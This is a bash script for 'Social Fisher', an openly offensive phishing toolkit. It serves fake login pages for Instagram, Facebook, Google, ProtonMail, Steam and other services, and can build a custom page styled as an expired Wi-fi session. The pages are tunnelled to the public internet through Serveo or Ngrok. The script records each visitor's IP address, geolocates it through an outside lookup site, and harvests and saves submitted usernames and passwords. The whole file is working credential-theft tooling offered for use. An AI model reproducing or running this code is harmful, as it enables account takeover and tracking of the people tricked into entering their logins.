#!/bin/bash

#            --------------------------------------------------
#                               Social Fisher              
#            --------------------------------------------------
#                  Copyright (C) <2019>  <Entynetproject>
#
#        This program is free software: you can redistribute it and/or modify
#        it under the terms of the GNU General Public License as published by
#        the Free Software Foundation, either version 3 of the License, or
#        any later version.
#
#        This program is distributed in the hope that it will be useful,
#        but WITHOUT ANY WARRANTY; without even the implied warranty of
#        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#        GNU General Public License for more details.
#
#        You should have received a copy of the GNU General Public License
#        along with this program.  If not, see <http://www.gnu.org/licenses/>.

printf '\033]2;Social Fisher\a'

trap 'printf "\n";stop;exit 1' 2
clear

dependencies() {

command -v php > /dev/null 2>&1 || { echo -e "\n\033[1;31m[\033[0m-\033[1;31m] Error, php is not installed!\033[0m"; exit; }
command -v curl > /dev/null 2>&1 || { echo -e "\n\033[1;31m[\033[0m-\033[1;31m] Error, curl is not installed!\033[0m"; exit; }

}

menu() {
printf "\n"
printf "\033[1;92m[\033[0m\033[1;77m1\033[0m\033[1;92m]\033[0m\033[1;93m Instagram\033[0m    \033[1;92m[\033[0m\033[1;77m10\033[0m\033[1;92m]\033[0m\033[1;93m Steam\033[0m       \033[1;92m[\033[0m\033[1;77m19\033[0m\033[1;92m]\033[0m\033[1;93m Custom Template\033[0m\n"
printf "\033[1;92m[\033[0m\033[1;77m2\033[0m\033[1;92m]\033[0m\033[1;93m Facebook\033[0m     \033[1;92m[\033[0m\033[1;77m11\033[0m\033[1;92m]\033[0m\033[1;93m GitLab\033[0m      \033[1;92m[\033[0m\033[1;77m20\033[0m\033[1;92m]\033[0m\033[1;93m Update Social Fisher\033[0m\n"
printf "\033[1;92m[\033[0m\033[1;77m3\033[0m\033[1;92m]\033[0m\033[1;93m Snapchat\033[0m     \033[1;92m[\033[0m\033[1;77m12\033[0m\033[1;92m]\033[0m\033[1;93m Yahoo\033[0m       \033[1;92m[\033[0m\033[1;77m21\033[0m\033[1;92m]\033[0m\033[1;93m Exit Social Fisher\033[0m\n"           
printf "\033[1;92m[\033[0m\033[1;77m4\033[0m\033[1;92m]\033[0m\033[1;93m Twitter\033[0m      \033[1;92m[\033[0m\033[1;77m13\033[0m\033[1;92m]\033[0m\033[1;93m Linkedin\033[0m\n"        
printf "\033[1;92m[\033[0m\033[1;77m5\033[0m\033[1;92m]\033[0m\033[1;93m GitHub\033[0m       \033[1;92m[\033[0m\033[1;77m14\033[0m\033[1;92m]\033[0m\033[1;93m ProtonMail\033[0m\n"
printf "\033[1;92m[\033[0m\033[1;77m6\033[0m\033[1;92m]\033[0m\033[1;93m Google\033[0m       \033[1;92m[\033[0m\033[1;77m15\033[0m\033[1;92m]\033[0m\033[1;93m Wordpress\033[0m\n"
printf "\033[1;92m[\033[0m\033[1;77m7\033[0m\033[1;92m]\033[0m\033[1;93m Spotify\033[0m      \033[1;92m[\033[0m\033[1;77m16\033[0m\033[1;92m]\033[0m\033[1;93m Microsoft\033[0m\n"
printf "\033[1;92m[\033[0m\033[1;77m8\033[0m\033[1;92m]\033[0m\033[1;93m Netflix\033[0m      \033[1;92m[\033[0m\033[1;77m17\033[0m\033[1;92m]\033[0m\033[1;93m Origin\033[0m\n"
printf "\033[1;92m[\033[0m\033[1;77m9\033[0m\033[1;92m]\033[0m\033[1;93m InstaFollow\033[0m  \033[1;92m[\033[0m\033[1;77m18\033[0m\033[1;92m]\033[0m\033[1;93m Pinterest\033[0m\n"
read -e -p $'\n\033[1;92m[\033[0m\033[1;77m>\033[0m\033[1;92m] Choose an option: \033[0m\en' option


if [[ $option == 1 || $option == 01 ]]; then
server="instagram"
start1

elif [[ $option == 2 || $option == 02 ]]; then
server="facebook"
start1
elif [[ $option == 3 || $option == 03 ]]; then
server="snapchat"
start1
elif [[ $option == 4 || $option == 04 ]]; then
server="twitter"
start1
elif [[ $option == 5 || $option == 05 ]]; then
server="github"
start1
elif [[ $option == 6 || $option == 06 ]]; then
server="google"
start1

elif [[ $option == 7 || $option == 07 ]]; then
server="spotify"
start1

elif [[ $option == 8 || $option == 08 ]]; then
server="netflix"
start1

elif [[ $option == 9 || $option == 09 ]]; then
server="instafollowers"
start1

elif [[ $option == 10 ]]; then
server="steam"
start1

elif [[ $option == 12 ]]; then
server="yahoo"
start1

elif [[ $option == 13 ]]; then
server="linkedin"
start1

elif [[ $option == 14 ]]; then
server="protonmail"
start1

elif [[ $option == 15 ]]; then
server="wordpress"
start1

elif [[ $option == 16 ]]; then
server="microsoft"
start1

elif [[ $option == 17 ]]; then
server="origin"
start1

elif [[ $option == 11 ]]; then
server="gitlab"
start1

elif [[ $option == 18 ]]; then
server="pinterest"
start1

elif [[ $option == 19 ]]; then
server="create"
createpage
start1

elif [[ $option == 20 ]]; then
#blue start 
	BS="-e \033[1;34m"
	BSA="\033[1;34m"
#color end
	CE="\033[0m"
#red start
	RS="-e \033[1;31m"
#green start
	GNS="-e \033[1;92m"
	GSA="\033[1;92m"
	RSA="\033[1;31m"
#white start
        WHS="\033[0;97m"
        
if [[ -d /data/data/com.termux ]]
then
if [[ -f /data/data/com.termux/files/usr/bin/socfish ]]
then
UPD="true"
else
UPD="false"
fi
else
if [[ -f /usr/local/bin/socfish ]]
then
UPD="true"
else
UPD="false"
fi
fi
{
ASESR="$( curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//' )"
} &> /dev/null
if [[ "$ASESR" = "" ]]
then 
sleep 1
echo ""$RS"["$CE"-"$RSA"] Download failed!"$CE""
sleep 1
exit
fi
if [[ $EUID -ne 0 ]]
then
sleep 1
echo ""$RS"["$CE"-"$RSA"] Permission denied!"$CE""
sleep 1
exit
fi
sleep 1
echo -e "\033[1;77m[\033[0m\033[1;93m*\033[0m\033[1;77m] Installing update...\033[0m"
{
mkdir ~/.socfish
cp -r ~/socfish/sites ~/.socfish
rm -rf ~/socfish
rm /bin/socfish
rm /usr/local/bin/socfish
rm /data/data/com.termux/files/usr/bin/socfish
cd ~
git clone https://github.com/entynetproject/socfish.git
if [[ "$UPD" != "true" ]]
then
sleep 0
else
cd socfish
chmod +x install.sh
./install.sh
fi
rm -rf ~/socfish/sites
cp -r ~/.socfish/sites ~/socfish
rm -rf ~/.socfish
} &> /dev/null
echo -e "\033[1;92m[\033[0m\033[0m+\033[0m\033[1;92m] Successfully updated!\033[0m"
sleep 1
exit

elif [[ $option == 21 ]]; then
exit 1

else
clear
banner
menu
fi
}

stop() {

checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
checkphp=$(ps aux | grep -o "php" | head -n1)
checkssh=$(ps aux | grep -o "ssh" | head -n1)
if [[ $checkngrok == *'ngrok'* ]]; then
pkill -f -2 ngrok > /dev/null 2>&1
killall -2 ngrok > /dev/null 2>&1
fi
if [[ $checkphp == *'php'* ]]; then
pkill -f -2 php > /dev/null 2>&1
killall -2 php > /dev/null 2>&1
fi
if [[ $checkssh == *'ssh'* ]]; then
pkill -f -2 ssh > /dev/null 2>&1
killall ssh > /dev/null 2>&1
fi
if [[ -e sendlink ]]; then
rm -rf sendlink
fi

}

banner() {

printf "\033[1;92m  ____            \033[0m\033[1;77m _____ _     _     \033[0m\n"
printf "\033[1;92m / ___|  ___   ___\033[0m\033[1;77m|  ___(_)___| |__  \033[0m\n"
printf "\033[1;92m \___ \ / _ \ / __|\033[0m\033[1;77m |_  | / __| '_ \ \033[0m\n"
printf "\033[1;92m  ___) | (_) | (__\033[0m\033[1;77m|  _| | \__ \ | | |\033[0m\n"
printf "\033[1;92m |____/ \___/ \___|\033[0m\033[1;77m_|   |_|___/_| |_|\033[0m\n"

}

createpage() {
default_cap1="Wi-fi Session Expired!"
default_cap2="Please login again."
default_user_text="Username:"
default_pass_text="Password:"
default_sub_text="Log-In"

read -e -p $'\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Title 1 (Default: \033[0m\033[1;77mWi-fi Session Expired!\033[0m\033[1;92m): \033[0m' cap1
cap1="${cap1:-${default_cap1}}"

read -e -p $'\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Title 2 (Default: \033[0m\033[1;77mPlease login again.\033[0m\033[1;92m): \033[0m' cap2
cap2="${cap2:-${default_cap2}}"

read -e -p $'\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Username field (Default: \033[0m\033[1;77mUsername:\033[0m\033[1;92m): \033[0m' user_text
user_text="${user_text:-${default_user_text}}"

read -e -p $'\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Password field (Default: \033[0m\033[1;77mPassword:\033[0m\033[1;92m): \033[0m' pass_text
pass_text="${pass_text:-${default_pass_text}}"

read -e -p $'\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Submit field (Default: \033[0m\033[1;77mLog-In\033[0m\033[1;92m): \033[0m' sub_text
sub_text="${sub_text:-${default_sub_text}}"

echo "<!DOCTYPE html>" > sites/create/login.html
echo "<html>" >> sites/create/login.html
echo "<body bgcolor=\"gray\" text=\"white\">" >> sites/create/login.html
IFS=$'\n'
printf '<center><h2> %s <br><br> %s </h2></center><center>\n' $cap1 $cap2 >> sites/create/login.html
IFS=$'\n'
printf '<form method="POST" action="login.php"><label>%s </label>\n' $user_text >> sites/create/login.html
IFS=$'\n'
printf '<input type="text" name="username" length=64>\n' >> sites/create/login.html
IFS=$'\n'
printf '<br><label>%s: </label>' $pass_text >> sites/create/login.html
IFS=$'\n'
printf '<input type="password" name="password" length=64><br><br>\n' >> sites/create/login.html
IFS=$'\n'
printf '<input value="%s" type="submit"></form>\n' $sub_text >> sites/create/login.html
printf '</center>' >> sites/create/login.html
printf '<body>\n' >> sites/create/login.html
printf '</html>\n' >> sites/create/login.html


}

catch_cred() {
account=$(grep -o 'Account:.*' sites/$server/usernames.txt | cut -d " " -f2)
IFS=$'\n'
password=$(grep -o 'Pass:.*' sites/$server/usernames.txt | cut -d ":" -f2)
printf "\033[1;92m[\033[0m\033[0m+\033[0m\033[1;92m]\033[0m\033[1;92m Account:\033[0m\033[1;77m %s\n\033[0m" $account
printf "\033[1;92m[\033[0m\033[0m+\033[0m\033[1;92m]\033[0m\033[1;92m Password:\033[0m\033[1;77m %s\n\033[0m" $password
cat sites/$server/usernames.txt >> sites/$server/saved.usernames.txt
printf "\033[1;92m[\033[0m\033[0m+\033[0m\033[1;92m] Saved:\033[0m\033[1;77m sites/%s/saved.usernames.txt\033[0m\n" $server
sleep 0.5
printf "\n\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Waiting for targets...\033[0m\n"
}


catch_ip() {
touch sites/$server/saved.usernames.txt
ip=$(grep -a 'IP:' sites/$server/ip.txt | cut -d " " -f2 | tr -d '\r')
IFS=$'\n'
ua=$(grep 'User-Agent:' sites/$server/ip.txt | cut -d '"' -f2)
printf "\033[1;92m[\033[0m\033[0m+\033[0m\033[1;92m] Target IP:\033[0m\033[1;77m %s\033[0m\n" $ip
printf "\033[1;92m[\033[0m\033[0m+\033[0m\033[1;92m] User-Agent:\033[0m\033[1;77m %s\033[0m\n" $ua
printf "\033[1;92m[\033[0m\033[0m+\033[0m\033[1;92m] Saved:\033[0m\033[1;77m %s/saved.ip.txt\033[0m\n" $server
cat sites/$server/ip.txt >> sites/$server/saved.ip.txt


if [[ -e iptracker.log ]]; then
rm -rf iptracker.log
fi

IFS='\n'
iptracker=$(curl -s -L "www.ip-tracker.org/locator/ip-lookup.php?ip=$ip" --user-agent "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" > iptracker.log)
IFS=$'\n'
continent=$(grep -o 'Continent.*' iptracker.log | head -n1 | cut -d ">" -f3 | cut -d "<" -f1)
printf "\n"
hostnameip=$(grep  -o "</td></tr><tr><th>Hostname:.*" iptracker.log | cut -d "<" -f7 | cut -d ">" -f2)
if [[ $hostnameip != "" ]]; then
printf "\033[1;92m[\033[0m+\033[1;92m] Hostname:\033[0m\033[1;77m %s\033[0m\n" $hostnameip
fi
##

reverse_dns=$(grep -a "</td></tr><tr><th>Hostname:.*" iptracker.log | cut -d "<" -f1)
if [[ $reverse_dns != "" ]]; then
printf "\033[1;92m[\033[0m+\033[1;92m] Reverse DNS:\033[0m\033[1;77m %s\033[0m\n" $reverse_dns
fi
##


if [[ $continent != "" ]]; then
printf "\033[1;92m[\033[0m+\033[1;92m] IP Continent:\033[0m\033[1;77m %s\033[0m\n" $continent
fi
##

country=$(grep -o 'Country:.*' iptracker.log | cut -d ">" -f3 | cut -d "&" -f1)
if [[ $country != "" ]]; then
printf "\033[1;92m[\033[0m+\033[1;92m] IP Country:\033[0m\033[1;77m %s\033[0m\n" $country
fi
##

state=$(grep -o "tracking lessimpt.*" iptracker.log | cut -d "<" -f1 | cut -d ">" -f2)
if [[ $state != "" ]]; then
printf "\033[1;92m[\033[0m+\033[1;92m] State:\033[0m\033[1;77m %s\033[0m\n" $state
fi
##
city=$(grep -o "City Location:.*" iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)

if [[ $city != "" ]]; then
printf "\033[1;92m[\033[0m+\033[1;92m] City Location:\033[0m\033[1;77m %s\033[0m\n" $city
fi
##

isp=$(grep -o "ISP:.*" iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
if [[ $isp != "" ]]; then
printf "\033[1;92m[\033[0m+\033[1;92m] ISP:\033[0m\033[1;77m %s\033[0m\n" $isp
fi
##

as_number=$(grep -o "AS Number:.*" iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
if [[ $as_number != "" ]]; then
printf "\033[1;92m[\033[0m+\033[1;92m] AS Number:\033[0m\033[1;77m %s\033[0m\n" $as_number
fi
##

ip_speed=$(grep -o "IP Address Speed:.*" iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
if [[ $ip_speed != "" ]]; then
printf "\033[1;92m[\033[0m+\033[1;92m] IP Address Speed:\033[0m\033[1;77m %s\033[0m\n" $ip_speed
fi
##
ip_currency=$(grep -o "IP Currency:.*" iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)

if [[ $ip_currency != "" ]]; then
printf "\033[1;92m[\033[0m+\033[1;92m] IP Currency:\033[0m\033[1;77m %s\033[0m\n" $ip_currency
fi
##
rm -rf iptracker.log
printf "\n\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Waiting for credentials...\033[0m\n"

}


serverx() {
printf "\033[1;77m[\033[0m\033[1;93m*\033[0m\033[1;77m] Starting php server...\033[0m\n"
cd sites/$server && php -S 127.0.0.1:$port > /dev/null 2>&1 & 
sleep 2
printf "\033[1;77m[\033[0m\033[1;93m*\033[0m\033[1;77m] Starting Serveo...\033[0m\n"
command -v ssh > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, ssh is not installed!\033[0m"; exit; }
if [[ -e sendlink ]]; then
rm -rf sendlink
fi
$(which sh) -c 'ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:'$port' serveo.net 2> /dev/null > sendlink ' &
sleep 10
send_link=$(grep -o "https://[0-9a-z]*\.serveo.net" sendlink)
printf '\033[1;93m[\033[0m\033[1;77m+\033[0m\033[1;93m] Direct link:\033[0m\033[1;77m %s \n' $send_link
checkfound


}

startx() {
if [[ -e sites/$server/ip.txt ]]; then
rm -rf sites/$server/ip.txt

fi
if [[ -e sites/$server/usernames.txt ]]; then
rm -rf sites/$server/usernames.txt

fi

default_port="3333" #$(seq 1111 4444 | sort -R | head -n1)
printf '\033[1;92m[\033[0m\033[1;77m>\033[0m\033[1;92m] Choose a port (Default:\033[0m\033[1;77m %s\033[0m\033[1;92m): \033[0m' $default_port
read -e port
port="${port:-${default_port}}"
serverx

}


start() {
if [[ -e sites/$server/ip.txt ]]; then
rm -rf sites/$server/ip.txt

fi
if [[ -e sites/$server/usernames.txt ]]; then
rm -rf sites/$server/usernames.txt

fi



if [[ -e ngrok ]]; then
sleep 0
else
command -v unzip > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, unzip is not installed!\033[0m"; exit; }
command -v wget > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, wget is not installed!\033[0m"; exit; }
printf "\033[1;77m[\033[0m\033[1;93m*\033[0m\033[1;77m] Downloading Ngrok...\033[0m\n"
arch=$(uname -a | grep -o 'arm' | head -n1)
arch2=$(uname -a | grep -o 'Android' | head -n1)
if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1

if [[ -e ngrok-stable-linux-arm.zip ]]; then
unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok-stable-linux-arm.zip
else
printf "\033[1;31m[\033[0m-\033[1;31m] Download failed!\033[0m\n"
exit
fi



else
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1 
if [[ -e ngrok-stable-linux-386.zip ]]; then
unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok-stable-linux-386.zip
else
printf "\033[1;31m[\033[0m-\033[1;31m] Download failed!\033[0m\n"
exit
fi
fi
fi

printf "\033[1;77m[\033[0m\033[1;93m*\033[0m\033[1;77m] Starting php server...\033[0m\n"
cd sites/$server && php -S 127.0.0.1:3333 > /dev/null 2>&1 & 
sleep 2
printf "\033[1;77m[\033[0m\033[1;93m*\033[0m\033[1;77m] Starting Ngrok...\033[0m\n"
./ngrok http 3333 > /dev/null 2>&1 &
sleep 10

link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\033[1;92m[\033[0m+\033[1;92m] Direct link:\033[0m\033[1;77m %s\033[0m\n" $link
checkfound
}

start1() {
if [[ -e sendlink ]]; then
rm -rf sendlink
fi


printf "\n"
printf "\033[1;92m[\033[0m\033[1;77m1\033[0m\033[1;92m]\033[0m\033[1;93m Serveo\033[0m\n"
printf "\033[1;92m[\033[0m\033[1;77m2\033[0m\033[1;92m]\033[0m\033[1;93m Ngrok\033[0m\n"
default_option_server="1"
read -e -p $'\n\033[1;92m[\033[0m\033[1;77m>\033[0m\033[1;92m] Choose portfwd service: \033[0m\en' option_server
option_server="${option_server:-${default_option_server}}"
if [[ $option_server == 1 || $option_server == 01 ]]; then
startx

elif [[ $option_server == 2 || $option_server == 02 ]]; then
start
else
clear
banner
start1
fi

}
checkfound() {
printf "\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Waiting for targets...\033[0m\n"
while [ true ]; do


if [[ -e "sites/$server/ip.txt" ]]; then
printf "\033[1;92m[\033[0m+\033[1;92m] Target opened the link!\n"
sleep 0.5
printf "\n\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Waiting for IP...\033[0m\n"
sleep 0.6
printf "\033[1;92m[\033[0m+\033[1;92m] IP found!\n"
catch_ip
rm -rf sites/$server/ip.txt
fi
sleep 0.5
if [[ -e "sites/$server/usernames.txt" ]]; then
printf "\033[1;92m[\033[0m+\033[0m\033[1;92m] Credentials found!\n"
catch_cred
rm -rf sites/$server/usernames.txt
fi
sleep 0.5


done 

}
banner
dependencies
menu
